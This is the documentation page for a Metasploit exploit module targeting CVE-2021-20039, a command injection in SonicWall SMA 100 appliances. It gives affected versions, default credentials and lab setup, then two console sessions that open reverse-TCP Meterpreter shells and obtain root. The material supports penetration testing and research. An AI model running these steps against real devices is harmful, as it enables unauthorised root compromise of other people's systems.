metasploit-gs/documentation/modules/exploit/linux/http/sonicwall_cve_2021_20039.md at 3da170a43c7f288fe9bc88fe325da488733acac3

adam/metasploit-gs

Fork 0

Files

T

Jake Baines d4ee9a0183 Initial commit of CVE-2021-20039 exploit

2022-01-10 12:43:50 -08:00

4.6 KiB

Raw Blame History

Vulnerable Application

Description

This module exploits an authenticated command injection vulnerability in the SonicWall SMA 100 series web interface. Exploitation results in command execution as root. The affected versions are:

10.2.1.2-24sv and below
10.2.0.8-37sv and below
9.0.0.11-31sv and below

Installation

SonicWall SMA 500v 10.2.1.0-sv17 on VMWare Fusion

Download 10.2.1.0-sv17 from: https://software.sonicwall.com/Firmware/sw_smavm_eng_10.2.1.0_10.2.1_p_17sv_1268045.ova
From Fusion, import the downloaded ova.
Start the VM.
Log in to the command line interface using "admin" and "password".
Hit "1" for "Setup Wizard".
Configure the device with an appropriate address, gateway, and netmask (the device doesn't use DHCP).
Done!

Verification Steps

Follow the above instructions to install SMA 500v
Do: use exploit/linux/http/sonicwall_cve_2021_20039
Do: set RHOST <ip>
Do: check
Verify the remote target is flagged as vulnerable
Do: set LHOST <ip>
Do: exploit
You should get a Meterpreter session.

Options

USERNAME

The username to authenticate to the web server with. The default value is "admin".

PASSWORD

The password to authenticate to the web server with. The default value is "password".

PORTALNAME

The name of the SMA portal to authenticate to. The default value is "VirtualOffice".

SWDOMAIN

The name of the domain to authenticate to. The default is "LocalDomain".

Scenarios

SMA 500v 10.2.1.1-19sv. Default creds. Get Meterpreter session.

msf6 > use exploit/linux/http/sonicwall_cve_2021_20039
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set RHOST 10.0.0.7
RHOST => 10.0.0.7
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > check

[*] Version found: 10.2.1.1-19sv
[*] 10.0.0.7:443 - The target appears to be vulnerable. Based on the discovered version.
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set LHOST 10.0.0.9
LHOST => 10.0.0.9
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > exploit

[*] Started reverse TCP handler on 10.0.0.9:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version found: 10.2.1.1-19sv
[+] The target appears to be vulnerable. Based on the discovered version.
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Authentication successful
[*] Command Stager progress -   1.42% done (36/2533 bytes)
- truncated -
[*] Command Stager progress -  98.07% done (2484/2533 bytes)
[*] Sending stage (984904 bytes) to 10.0.0.7
[*] Meterpreter session 2 opened (10.0.0.9:4444 -> 10.0.0.7:58293 ) at 2021-11-17 10:56:30 -0800
[*] Command Stager progress -  99.37% done (2517/2533 bytes)
[*] Command Stager progress - 100.00% done (2533/2533 bytes)

meterpreter > getuid
Server username: root
meterpreter > shell
Process 6708 created.
Channel 1 created.
uname -a
Linux sslvpn 3.13.3 #1 SMP Mon Aug 9 11:13:43 GMT 2021 i686 i686 i386 GNU/Linux
id
uid=0(root) gid=99(nobody) groups=0(root),99(nobody)

SMA 500v 9.0.0.10-28sv. Non-default creds. Get Meterpreter session.

msf6 > use exploit/linux/http/sonicwall_cve_2021_20039
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set RHOST 10.0.0.6
RHOST => 10.0.0.6
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > check

[*] Version found: 9.0.0.10-28sv
[*] 10.0.0.6:443 - The target appears to be vulnerable. Based on the discovered version.
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set LHOST 10.0.0.9
LHOST => 10.0.0.9
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > set PASSWORD labpass1
PASSWORD => labpass1
msf6 exploit(linux/http/sonicwall_cve_2021_20039) > exploit

[*] Started reverse TCP handler on 10.0.0.9:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version found: 9.0.0.10-28sv
[+] The target appears to be vulnerable. Based on the discovered version.
[*] Executing Linux Dropper for linux/x86/meterpreter/reverse_tcp
[*] Authentication successful
[*] Command Stager progress -   1.42% done (36/2533 bytes)
- Truncated -
[*] Command Stager progress -  98.07% done (2484/2533 bytes)
[*] Sending stage (984904 bytes) to 10.0.0.6
[*] Meterpreter session 1 opened (10.0.0.9:4444 -> 10.0.0.6:38833 ) at 2021-11-17 11:00:29 -0800
[*] Command Stager progress -  99.37% done (2517/2533 bytes)
[*] Command Stager progress - 100.00% done (2533/2533 bytes)

meterpreter > getuid
Server username: root
meterpreter > shell
Process 24220 created.
Channel 1 created.
uname -a
Linux sslvpn 3.1.0 #1 SMP Thu Feb 18 15:44:36 GMT 2021 i686 i686 i386 GNU/Linux
id
uid=0(root) gid=99(nobody) groups=0(root),99(nobody)

4.6 KiB Raw Blame History